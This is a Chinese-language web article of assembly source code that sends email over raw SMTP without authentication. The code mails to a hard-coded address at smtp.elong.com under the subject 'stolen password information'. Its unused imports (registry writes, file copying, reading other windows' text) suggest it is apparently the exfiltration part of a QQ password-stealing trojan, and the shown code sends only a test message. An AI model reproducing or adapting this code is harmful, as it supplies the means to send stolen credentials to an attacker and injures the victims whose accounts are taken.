利用汇编发送无需认证的eMail

/ns/wz/comp/data/20020813023037.htm

利用汇编发送无需认证的eMail

Author: whg
Email: whg@whitecell.org
Homepage:http://www.whitecell.org


include win32.inc
.586
.model flat,stdcall
.data





SmtpSrvr db 'smtp.elong.com',0
MailFrom0 db 'qqspy2000@elong.com',0
RcptTo0 db 'qqspy2000@elong.com',0
From0 db 'QQSpy2000.@elong.com',0
To0 db 'QQSpy2000.@elong.com',0
Subject0 db '被盗密码信息',0
Content0 db '这是实验版',0

HelloSrvr db 'HELO %s',0dh,0ah,0
MailFrom db 'MAIL FROM: %s',0dh,0ah,0
RcptTo db 'RCPT TO: %s',0dh,0ah,0
MailData db 'DATA',0dh,0ah,0
From db 'FROM: %s',0dh,0ah,0
To db 'TO: %s',0dh,0ah,0
Subject db 'Subject: %s',0dh,0ah,0
Content db '哈哈: %s',0dh,0ah,0
EndMail db '.',0dh,0ah,0
QuitMail db 'QUIT',0dh,0ah,0

.code

extrn GetModuleFileNameA: proc
extrn GetSystemDirectoryA: proc
extrn CopyFileA: proc
extrn RegOpenKeyA: proc
extrn RegSetValueExA: proc
extrn RegCloseKey: proc
extrn GetModuleHandleA: proc
extrn DialogBoxParamA: proc
extrn MessageBoxA: proc
extrn ExitProcess: proc
extrn SetTimer: proc
extrn EnumWindows: proc
extrn EnumChildWindows: proc
extrn GetWindowTextA: proc
extrn SetDlgItemTextA: proc
extrn GetDlgItemTextA: proc
extrn GetClassNameA: proc
extrn SendMessageA: proc
extrn GetWindowLongA: proc
extrn ShowWindow: proc
extrn _wsprintfA: proc
extrn WSAStartup: proc
extrn socket: proc
extrn htons: proc
extrn gethostbyname: proc
extrn connect: proc
extrn send: proc
extrn recv: proc
extrn closesocket: proc
extrn WSACleanup: proc
extrn GlobalAlloc: proc
extrn GlobalFree: proc
extrn Sleep: proc
Start:

call SendEmail,OFF SmtpSrvr,OFF MailFrom0,OFF RcptTo0,OFF From0,OFF To0,OFF Subject0,OFF Content0,NULL
call ExitProcess,NULL

SendEmail proc pSmptSrvr: DWORD,pMailFrom: DWORD,pRcptTo: DWORD,pFrom: DWORD,pTo: DWORD,pSubject: DWORD,pContent: DWORD,pFile: DWORD
pusha
call GlobalAlloc,GMEM_ZEROINIT,1000h
mov [eax],esp
lea esi,[eax+4]
lea edi,[eax+size SOCKADDR+4]
call WSAStartup,L 101h,edi
or eax,eax
jnz SendEmailError
call socket,AF_INET,SOCK_STREAM,NULL
cmp eax,-1h
jz SendEmailError
mov ebx,eax
mov [esi.sin_family],AF_INET
call htons,L 25
mov [esi.sin_port],ax
call gethostbyname,OFF SmtpSrvr
or eax,eax
jz SendEmailError
mov eax,[eax.h_ip]
mov eax,[eax]
mov [esi.sin_addr],eax
call connect,ebx,esi,size SOCKADDR
cmp eax,-1h
jz SendEmailError
;HELO SMTP.ELONG.COM
call _wsprintfA,edi,OFF HelloSrvr,pSmptSrvr
call send,ebx,OFF edi,eax,NULL
;MAIL FROM:
call _wsprintfA,edi,OFF MailFrom,pMailFrom
call send,ebx,edi,eax,NULL
;RCPT TO:
call _wsprintfA,edi,OFF RcptTo,pRcptTo
call send,ebx,edi,eax,NULL
;DATA
call send,ebx,OFF MailData,L 06h,NULL
;FROM:
call _wsprintfA,edi,OFF From,pFrom
call send,ebx,edi,eax,NULL
;TO:
call _wsprintfA,edi,OFF To,pTo
call send,ebx,edi,eax,NULL
;SUBJECT:
call _wsprintfA,edi,OFF Subject,pSubject
call send,ebx,edi,eax,NULL
;CONTENT
call _wsprintfA,edi,OFF Content ,pContent
call send,ebx,edi,eax,NULL
;EndMail
call send,ebx,OFF EndMail,L 03h,NULL
;Quit
call send,ebx,OFF QuitMail,L 06h,NULL
call Sleep,1000h
call AskSrvr
SendEmailError:
call closesocket,ebx
call WSACleanup
sub esi,04
mov esp,[esi]
call GlobalFree,esi
popad
ret
SendEmail Endp
MsgBox:
pushad
call MessageBoxA,NULL,edi,edi,NULL
popad
ret
AskSrvr:
pushad
call recv,ebx,edi,L 100h,NULL
call MessageBoxA,NULL,edi,edi,NULL
popad
ret
End Start